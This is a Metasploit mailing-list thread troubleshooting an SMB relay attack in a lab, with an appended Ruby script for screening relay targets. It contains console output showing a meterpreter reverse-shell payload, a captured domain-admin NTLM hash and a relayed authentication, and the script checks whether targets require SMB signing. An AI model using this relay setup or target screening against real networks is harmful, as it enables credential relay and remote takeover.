Metasploit mailing list archives
Re: SMB_RELAY attacks still possible?
From: Kurt Grutzmacher <grutz () jingojango net>
Date: Fri, 24 Dec 2010 23:53:13 -0500
Hi Brian,

SMBRELAY attacks should still work depending upon your negotiated NTLM settings and what is currently supported within Metasploit's library. Can you confirm that metasploit to DC works via smb_login or psexec? If yes then SMBRELAY really should work. What version of Windows is your DC running?

--
Kurt Grutzmacher -=- grutz () jingojango net

On Fri, Dec 24, 2010 at 3:25 PM, Epic <epicdonk () gmail com> wrote:

I should also note that I have confirmed it is possible to go from 192.168.0.2 -> \\192.168.0.1\ADMIN$ manually using the currently logged in credentials.

On Fri, Dec 24, 2010 at 1:22 PM, Brian S Traveling <epicdonk () gmail com> wrote:

Hi,

Is it possible to still carry out smb_relay attacks by specifying a different SMBHOST? It doesn't seem to be working for me... I was under the assumption it was still possible...

my test environment:
domain controller: 192.168.0.1 (also dhcp/router)
windows 7 workstation: 192.168.0.2 (clicking the UNC path - joined to domain)
metasploit box: 192.168.0.35 (not joined to domain)

msf exploit(smb_relay) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SMBHOST     192.168.0.1      no        The target SMB server (leave empty for originating system)
   SRVHOST     192.168.0.35     yes       The local host to listen on.
   SRVPORT     445              yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, none, process
   LHOST     192.168.0.35     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.35:4444
[*] Server started.
msf exploit(smb_relay) >
[*] Received 192.168.0.2:62573 MYDOMAIN\domainadmin LMHASH:000000000000000000000000000000000000000000000000 NTHASH:91fw9w155441a411b1a40edf8d7adlf70101000000000000a2cwcbd785a2cb020f640031811663700000000020000000000000000000000 OS: LM:
[*] Authenticating to 192.168.0.1 as MYDOMAIN\domainadmin...
[*] AUTHENTICATED as MYDOMAIN\domainadmin...
[*] Connecting to the ADMIN$ share...
[*] Error processing request from 192.168.0.2:62573 (115): Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
/opt/metasploit3/msf3/lib/rex/proto/smb/client.rb:176:in `smb_recv_parse'
/opt/metasploit3/msf3/lib/rex/proto/smb/client.rb:994:in `tree_connect'
/opt/metasploit3/msf3/lib/rex/proto/smb/simpleclient.rb:253:in `connect'
(eval):133:in `smb_haxor'
(eval):530:in `smb_cmd_session_setup'
(eval):332:in `smb_cmd_dispatch'
/opt/metasploit3/msf3/lib/msf/core/exploit/smb.rb:716:in `smb_recv'
/opt/metasploit3/msf3/lib/msf/core/exploit/smb.rb:647:in `on_client_data'
/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:386:in `start_service'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:45:in `call'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:45:in `on_client_data'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:182:in `monitor_clients'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:180:in `each'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:180:in `monitor_clients'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:69:in `start'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `call'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `call'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `spawn'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `initialize'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `new'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `spawn'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:68:in `start'
/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:393:in `start_service'
/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:313:in `exploit'
/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:201:in `job_run_proc'
/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:148:in `run'
/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `call'
/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `start'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `call'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `call'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `spawn'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `initialize'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `new'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `spawn'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'
/opt/metasploit3/msf3/lib/rex/job_container.rb:31:in `start'
/opt/metasploit3/msf3/lib/rex/job_container.rb:155:in `start_bg_job'
/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:145:in `run'
/opt/metasploit3/msf3/lib/msf/base/simple/exploit.rb:125:in `exploit_simple'
/opt/metasploit3/msf3/lib/msf/base/simple/exploit.rb:147:in `exploit_simple'
/opt/metasploit3/msf3/lib/msf/ui/console/command_dispatcher/exploit.rb:154:in `cmd_exploit'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in `send'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in `run_command'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:208:in `run_single'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in `each'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in `run_single'
/opt/metasploit3/msf3/lib/rex/ui/text/shell.rb:143:in `run'
/usr/local/bin/msfconsole:124
/SMBRelay

Thanks!

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
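A check a practitioner would run before pointing smb_relay at a target, added here as example code (it is not from the thread and not Metasploit's own code): parse the SecurityMode field of the server's SMB negotiate response and report whether the server requires message signing. A server that requires signing accepts the relayed NTLM authentication but rejects the unsigned commands that follow it, such as the tree connect, which is one way a relay can print AUTHENTICATED and then fail with STATUS_ACCESS_DENIED. Domain controllers require SMB signing by default, so they are the first place to run this. The SMB1 (NT LM 0.12) and SMB2 negotiate responses below are constructed by hand for the example, not captured from a host; the flag values are the ones defined in MS-CIFS and MS-SMB2. Handling SMB2 goes beyond the SMB1-only setup discussed in the thread.

```ruby
# Added example: decide from a server's SMB negotiate response whether it requires
# message signing. Not part of the thread or of Metasploit's own code; the packets
# built below are constructed by hand for the example, not captured from a host.

# SecurityMode bits, SMB1 NT LM 0.12 negotiate response (MS-CIFS 2.2.4.52.2).
SMB1_SIGNING_ENABLED  = 0x04
SMB1_SIGNING_REQUIRED = 0x08
# SecurityMode bits, SMB2 NEGOTIATE response (MS-SMB2 2.2.4).
SMB2_SIGNING_ENABLED  = 0x0001
SMB2_SIGNING_REQUIRED = 0x0002

# Returns {dialect:, signing_enabled:, signing_required:} for a negotiate
# response in either dialect family; raises ArgumentError for anything else.
def parse_signing(resp)
  resp = resp.b
  case resp.byteslice(0, 4)
  when "\xFFSMB".b
    # SMB1: 32-byte header, WordCount at 32, DialectIndex at 33..34, SecurityMode at 35.
    raise ArgumentError, "truncated SMB1 packet" if resp.bytesize < 36
    raise ArgumentError, "not SMB_COM_NEGOTIATE" unless resp.getbyte(4) == 0x72
    raise ArgumentError, "not an NT LM 0.12 response" unless resp.getbyte(32) == 17
    mode = resp.getbyte(35)
    { dialect: "SMB1",
      signing_enabled:  (mode & SMB1_SIGNING_ENABLED) != 0,
      signing_required: (mode & SMB1_SIGNING_REQUIRED) != 0 }
  when "\xFESMB".b
    # SMB2: 64-byte header, Command at 12..13; body StructureSize at 64..65, SecurityMode at 66..67.
    raise ArgumentError, "truncated SMB2 packet" if resp.bytesize < 68
    raise ArgumentError, "not SMB2 NEGOTIATE" unless resp.byteslice(12, 2).unpack1("v") == 0
    mode = resp.byteslice(66, 2).unpack1("v")
    { dialect: "SMB2",
      signing_enabled:  (mode & SMB2_SIGNING_ENABLED) != 0,
      signing_required: (mode & SMB2_SIGNING_REQUIRED) != 0 }
  else
    raise ArgumentError, "not an SMB packet"
  end
end

# One-line verdict for the relay operator.
def relay_verdict(resp)
  info = parse_signing(resp)
  if info[:signing_required]
    "#{info[:dialect]}: signing required; unsigned relayed commands will be rejected"
  elsif info[:signing_enabled]
    "#{info[:dialect]}: signing enabled but not required; relay should work"
  else
    "#{info[:dialect]}: signing disabled; relay should work"
  end
end

# Constructed SMB1 negotiate response (NT LM 0.12, WordCount 17) carrying the
# given SecurityMode byte. Field values other than SecurityMode are filler.
def smb1_negotiate_response(security_mode)
  # Header: magic, Command 0x72, Status, Flags, Flags2, PIDHigh, SecurityFeatures,
  # Reserved, TID, PIDLow, UID, MID = 32 bytes.
  header = "\xFFSMB".b + [0x72, 0, 0x88, 0xC001, 0].pack("CVCvv") +
           ("\x00" * 8).b + [0, 0, 0, 0, 0].pack("v5")
  # Words: DialectIndex, SecurityMode, MaxMpxCount, MaxNumberVcs, MaxBufferSize,
  # MaxRawSize, SessionKey, Capabilities, SystemTime, ServerTimeZone, ChallengeLength.
  words  = [0, security_mode, 50, 1, 16644, 65536, 0, 0x8001F3FD].pack("vCvvVVVV") +
           ("\x00" * 8).b + [0, 8].pack("vC")
  header + [17].pack("C") + words + [0].pack("v")   # WordCount, words, ByteCount
end

# Constructed SMB2 NEGOTIATE response (dialect 0x0210) carrying the given
# SecurityMode; again everything else is filler.
def smb2_negotiate_response(security_mode)
  header = "\xFESMB".b +
           [64, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0].pack("vvVvvVVQ<VVQ<") + ("\x00" * 16).b
  body   = [65, security_mode, 0x0210, 0].pack("vvvv") + ("\x00" * 16).b +
           [7, 0x100000, 0x100000, 0x100000].pack("V4") + ("\x00" * 16).b +
           [128, 0, 0].pack("vvV")
  header + body
end

if __FILE__ == $0
  puts relay_verdict(smb1_negotiate_response(0x0F))   # DC-style: signing required
  puts relay_verdict(smb1_negotiate_response(0x07))   # workstation-style: enabled only
  puts relay_verdict(smb2_negotiate_response(0x0003))
end
```

To use it against a real host, send an SMB_COM_NEGOTIATE request over port 445 and hand the raw reply to relay_verdict; the parser only needs the first 36 (SMB1) or 68 (SMB2) bytes. A "signing required" verdict means the target is not a usable relay destination regardless of whose credentials are captured.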
Current thread:
- SMB_RELAY attacks still possible? Brian S Traveling (Dec 24)
- Re: SMB_RELAY attacks still possible? Epic (Dec 24)
- Re: SMB_RELAY attacks still possible? Kurt Grutzmacher (Dec 24)
- Re: SMB_RELAY attacks still possible? Epic (Dec 24)